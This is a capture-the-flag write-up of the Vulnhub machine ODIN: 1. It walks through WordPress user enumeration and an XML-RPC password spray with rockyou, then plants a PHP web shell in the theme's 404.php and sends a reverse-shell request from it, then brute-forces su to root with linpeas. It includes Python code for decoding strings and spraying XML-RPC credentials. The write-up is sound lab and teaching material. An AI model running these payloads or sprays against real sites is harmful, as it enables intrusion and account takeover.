Difficulty: Easy
Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants, in the guise of a walker named Vegtam. Mímir, who guarded the well, asked him to sacrifice his left eye to allow him to drink from it, this being a symbol of his will to obtain knowledge.

This is ODIN: 1 from Vulnhub.


HTTP only.


It says:

Just another Joomla site

But that's a little joke, because it's actually WordPress.

root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin

wpscan only finds a user called 'odin', but trying to log in at wp-admin with any random password gives an error:

Unknown username. Check again or try your email address.

So that’s curious. What if we try admin?

Error: The password you entered for the username admin is incorrect

Right. So admin exists and odin does not: the two different error messages tell us which usernames are valid. What's up with that, wpscan? Lol.

We also have some encoded strings on the blog:


This is base32 and decodes to: rockyou nice wordlist

We have this:


Which is base64:

If you look closely, you won’t need it here

And this:


Which appears to be brainf^%k, which translates to:


Which doesn't appear to be useful anywhere.
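As an added example that is not part of the original writeup, here is a small Python triage script for strings like the three above: it guesses whether a blob is brainfuck, base32 or base64 and decodes it. The screenshots of the blog strings are not reproduced on this page, so the base32 and base64 samples are rebuilt from the decoded text given above, the brainfuck program is a short one written for this example that prints HI, and the last base64 string is the one found later in /root on the box.

```python
import base64
import binascii
import re

# Constructed samples standing in for the strings on the blog (the page's own
# screenshots are not reproduced). The base32 and base64 blobs are built from
# the decoded text the writeup reports; the brainfuck program is one written
# for this example and prints "HI".
SAMPLE_B32 = base64.b32encode(b"rockyou nice wordlist").decode()
SAMPLE_B64 = base64.b64encode(b"If you look closely, you won't need it here").decode()
SAMPLE_BF = "++++++++[>+++++++++<-]>.+."
# The base64 string found in /root on the box (this one is from the writeup).
ROOT_B64 = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo="

BF_CHARS = set("+-<>[].,")
B32_RE = re.compile(r"^[A-Z2-7]+=*$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+=*$")


def run_brainfuck(program, max_steps=1_000_000):
    """Minimal brainfuck interpreter with bracket matching and a step limit,
    so a looping program lifted from a target cannot hang the triage script."""
    code = [c for c in program if c in BF_CHARS]
    jumps, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']' in brainfuck program")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced '[' in brainfuck program")
    tape, ptr, pc, out, steps = [0] * 30000, 0, 0, bytearray(), 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ">":
            ptr = (ptr + 1) % len(tape)
        elif c == "<":
            ptr = (ptr - 1) % len(tape)
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = 0  # no stdin in triage mode
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return out.decode("utf-8", errors="replace")


def decode_blob(blob):
    """Guess the encoding of a string lifted from a web page and decode it.
    Returns (kind, text); kind is 'brainfuck', 'base32', 'base64' or 'unknown'.
    Order matters: the base32 alphabet is a subset of base64's, so base32 is
    tried first; a blob made only of brainfuck symbols never matches either."""
    s = "".join(blob.split())
    if s and set(s) <= BF_CHARS:
        return "brainfuck", run_brainfuck(s)
    for kind, pattern, decoder in (
        ("base32", B32_RE, base64.b32decode),
        ("base64", B64_RE, base64.b64decode),
    ):
        if pattern.match(s):
            try:
                raw = decoder(s)
            except (binascii.Error, ValueError):
                continue
            try:
                text = raw.decode("utf-8")
            except UnicodeDecodeError:
                continue  # valid alphabet but not text: probably the other encoding
            if text.isprintable() or text.strip().isprintable():
                return kind, text
    return "unknown", blob


if __name__ == "__main__":
    for blob in (SAMPLE_B32, SAMPLE_B64, SAMPLE_BF, ROOT_B64):
        print(decode_blob(blob))
```

The brainfuck interpreter has a step limit on purpose: a decoy program on a target can loop forever, and a triage script should fail loudly rather than hang.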

So a password attack on admin? Yes.

root@kali:/opt/vulnhub/odin# wpscan -U admin -P /usr/share/wordlists/rockyou.txt --url http://odin
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / qwerty
Trying admin / ashley Time: 00:00:03 <                                                     > (20 / 14344412)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: qwerty
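The "password attack on Xmlrpc" line matters: wpscan is not posting to wp-login.php but to /xmlrpc.php, sending one wp.getUsersBlogs call per password, because that method needs nothing beyond a valid login and answers with a fault 403 for a bad one. The Python below is an added example, not part of the writeup or of wpscan, that builds that request, classifies the response, and runs the exchange against a constructed stand-in for the target's xmlrpc.php (no network; the stand-in, the site URL http://odin/ and the short wordlist are assumptions).

```python
import xmlrpc.client

# wp.getUsersBlogs needs no capability beyond a valid login, which is why the
# Xmlrpc attack uses it: a good password returns the blog list, a bad one
# returns XML-RPC fault 403 "Incorrect username or password."
LOGIN_METHOD = "wp.getUsersBlogs"


def build_login_probe(username, password):
    """XML body of one POST to /xmlrpc.php that tests a single credential pair."""
    return xmlrpc.client.dumps((username, password), methodname=LOGIN_METHOD)


def credential_valid(response_xml):
    """True if the response is a blog list, False on the 403 login fault.
    Any other fault is unexpected (for example XML-RPC disabled) and is
    re-raised, so a spray never silently reports every password as wrong."""
    try:
        (blogs,), _ = xmlrpc.client.loads(response_xml)
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == 403:
            return False
        raise
    return isinstance(blogs, list) and len(blogs) > 0


def fake_xmlrpc_endpoint(request_xml, real_password):
    """Constructed stand-in for the target's xmlrpc.php (not a real server).
    It answers like WordPress: a 403 fault for a bad login, a blog array for a
    good one. The site details below are assumptions, not data from the box."""
    params, method = xmlrpc.client.loads(request_xml)
    if method != LOGIN_METHOD:
        fault = xmlrpc.client.Fault(-32601, "server error. requested method not found")
        return xmlrpc.client.dumps(fault, methodresponse=True)
    username, password = params
    if username == "admin" and password == real_password:
        blogs = [{"isAdmin": True, "url": "http://odin/", "blogid": "1",
                  "blogName": "Just another Joomla site",
                  "xmlrpc": "http://odin/xmlrpc.php"}]
        return xmlrpc.client.dumps((blogs,), methodresponse=True)
    fault = xmlrpc.client.Fault(403, "Incorrect username or password.")
    return xmlrpc.client.dumps(fault, methodresponse=True)


def spray(username, wordlist, real_password="qwerty"):
    """Try each password once, one request each, as wpscan's Xmlrpc attack does.
    Returns (found_password_or_None, requests_sent)."""
    sent = 0
    for candidate in wordlist:
        sent += 1
        response = fake_xmlrpc_endpoint(build_login_probe(username, candidate), real_password)
        if credential_valid(response):
            return candidate, sent
    return None, sent


if __name__ == "__main__":
    # Constructed short wordlist in rockyou order; the real run used rockyou.txt.
    print(spray("admin", ["123456", "12345", "123456789", "password", "iloveyou", "qwerty", "ashley"]))
```

Every attempt, right or wrong, is an HTTP 200 POST to /xmlrpc.php, so a detection that only watches wp-login.php status codes sees nothing. Count POSTs to xmlrpc.php per source, or the wp.getUsersBlogs method name in request bodies, and disable XML-RPC where the site does not need it.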


One of the blog posts is called:

Twenty Twenty: 404 Template (404.php)

Wonder if that is a hint?

We can edit the file in the WordPress theme editor here:


And add:

<?php system($_GET['cmd']);?>

into the upper part of the file, beneath the opening html tag. We can then reach the file at:


And issue commands. Like a shell. Like this:

GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1

On the box

We can log in to MySQL with joomla:joomla and grab some hashes, but they don't crack easily. There is a shortcut here, though: linpeas has a mode (-a) that will brute-force su, and this box has weak passwords:

[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
  Bruteforcing user root...                                                                                                                               
  You can login as root using password: jasmine
  Bruteforcing user osboxes...
  Bruteforcing user voldemort...
  Bruteforcing user rockyou...
  You can login as rockyou using password: rockyou

So really that’s it; let’s check it:

rockyou@osboxes:~$ su root
Password: jasmine

root@osboxes:/home/osboxes# cd /root
root@osboxes:~# ls -lash
total 48K
4.0K drwx------  7 root root 4.0K Dec 16 03:24 .
4.0K drwxr-xr-x 23 root root 4.0K Jul  5 22:43 ..
4.0K drwx------  2 root root 4.0K Jun 24 17:24 .aptitude
4.0K -rw-------  1 root root    1 Dec  4 15:57 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
4.0K -rw-r--r--  1 root root  109 Dec  5 08:34 bjorn
4.0K drwx------  6 root root 4.0K Dec  4 15:36 .cache
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .config
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .dbus
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .local
4.0K -rw-r--r--  1 root root  161 Dec  5  2019 .profile
4.0K -rw-r-----  1 root root    4 Dec 16 03:24
root@osboxes:~# file bjorn
bjorn: UTF-8 Unicode text
root@osboxes:~# cat bjorn

Have a nice day!

root@osboxes:~# echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=' | base64 -d
root@osboxes:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)